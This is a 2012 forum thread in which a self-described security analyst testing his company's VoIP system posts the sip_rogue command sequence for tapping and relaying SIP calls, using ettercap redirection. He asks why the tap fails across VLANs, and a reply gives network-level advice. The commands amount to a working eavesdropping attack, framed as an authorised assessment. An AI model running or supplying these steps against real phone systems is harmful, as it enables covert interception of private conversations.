Pages: [1]

Author Topic: voip Application-Level Interception need some adivce/help  (Read 1245 times)

0 Members and 1 Guest are viewing this topic.

Offline aliz

  • NULL
  • Posts: 2
  • Cookies: 0
    • View Profile
voip Application-Level Interception need some adivce/help
« on: January 13, 2012, 07:07:24 pm »

I need help I work as sec analyst for a notable company in my country. I'm currently in the activity of assessing VOIP setup. I'm using Application-Level Interception Techniques to test the setup weakness. The tool i'm using to conduct interception level attack is sip_rogue. Sip_rogue is included in bt4. The attack allows you as attacker to listen the conversation occurring between sip phones. The commands are :-

sip_rogue
telnet localhost 6060
Connection 0
create sipudpport port
create sipdispatcher disp
create sipregistrarconnector reg to 10.1.101.2:5060 with the domain
10.1.101.2
create rtphandler rtp
create sipendpoint hacker
issue hacker accept calls
issue hacker relay calls to sip:3500@10.1.100.35
issue hacker tap calls to sip:4000@10.1.100.40 (the attacker)

In the original attack mentioned in hacking exposed VOIP: voice over IP security secret and solution. The victim and the attacker in on the same vlan as proxy server but in my case its different VLAN. As i pick the fone (ext 4000) to listen on the conversation i just get the dial tone. I'm using ettercap to direct the traffic from the victim ip phone to bt4 machine running sip_rogue application.

I hope i can be helped with. Thanks

Report to moderator   Logged

Z3R0

  • Guest
Re: voip Application-Level Interception need some adivce/help
« Reply #1 on: January 14, 2012, 08:01:03 am »
Does the network you're on use inter-vlan routing? If not, this attack won't work, because often networks that implement multiple vlans also use vtp (vlan trunking protocol) and if you're not on the same vtp domain, and there isn't any inter-vlan routing, then you will be dealing with two completely different networks (your vlan and the target vlan). Ettercap won't be able to do all of this on its own, you will have to have access to the network infrastructure (switches, routers, etc).

A physical alternative would be to connect the target and yourself to a hub, then into whatever switch they are plugged into. If you're in a cisco environment beware of port-security as that will cause a whole slew of other obstacles.
« Last Edit: January 14, 2012, 08:03:32 am by m0rph »
Report to moderator   Logged

Offline aliz

  • NULL
  • Posts: 2
  • Cookies: 0
    • View Profile
Re: voip Application-Level Interception need some adivce/help
« Reply #2 on: January 14, 2012, 10:41:09 am »
Thank you for your quick reply. Yes my network does have inter-vlan routing. The voip server which is located in 150.150 vlan can easily be ping' from my vlan which is 130.*. Actually this 150 is entirely dedicated to voip stuff. I think this attack works on some level like if i enter the command status i get by object as ---*--- state means the connection/object i used.

What is not working I think is the tap command which allows me to listen  on the conversation. Here i cannot understand like my iphone e.g is on ip 130.10 in its network settings it knows the proxy server as 150.150 not expecting any traffic from bt4 machine running sip_rogue tool (ip *.*145.20).

When i fire wireshark i can sniff traffic between two sipendpoints.

Please help me forward.
Report to moderator   Logged
Pages: [1]